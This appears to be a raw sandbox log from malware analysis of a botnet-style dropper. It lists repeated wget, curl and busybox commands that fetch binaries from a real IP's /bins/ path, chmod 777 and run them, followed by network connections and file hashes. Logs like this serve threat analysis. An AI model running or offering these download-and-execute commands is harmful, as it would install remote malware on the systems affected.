[wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/chmod

[chmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q

[./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/rm

[rm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/wget

[wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/chmod

[chmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF

[./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/rm

[rm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/wget

[wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/chmod

[chmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB

[./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/rm

[rm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/wget

[wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/chmod

[chmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av

[./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/rm

[rm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/wget

[wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/chmod

[chmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC

[./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/rm

[rm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/wget

[wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/chmod

[chmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL

[./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/rm

[rm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/wget

[wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/chmod

[chmod 777 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P

[./MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/rm

[rm MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/usr/bin/wget

[wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/chmod

[chmod 777 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe

[./6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/rm

[rm 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/usr/bin/wget

[wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/chmod

[chmod 777 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy

[./8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/rm

[rm 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/usr/bin/wget

[wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/chmod

[chmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu

[./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/rm

[rm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/wget

[wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/chmod

[chmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f

[./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/rm

[rm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/wget

[wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/chmod

[chmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

[./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/rm

[rm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/wget

[wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/chmod

[chmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF

[./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/rm

[rm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/wget

[wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/chmod

[chmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB

[./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/rm

[rm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/wget

[wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/chmod

[chmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av

[./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/rm

[rm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/wget

[wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/chmod

[chmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC

[./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/rm

[rm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/wget

[wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/chmod

[chmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7

[./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/rm

[rm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/wget

[wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/chmod

[chmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs

[./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/rm

[rm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/wget

[wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/chmod

[chmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q

[./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/rm

[rm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/wget

[wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/chmod

[chmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL

[./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/rm

[rm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/wget

[wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/chmod

[chmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu

[./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/rm

[rm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/wget

[wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/chmod

[chmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f

[./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/rm

[rm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/wget

[wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97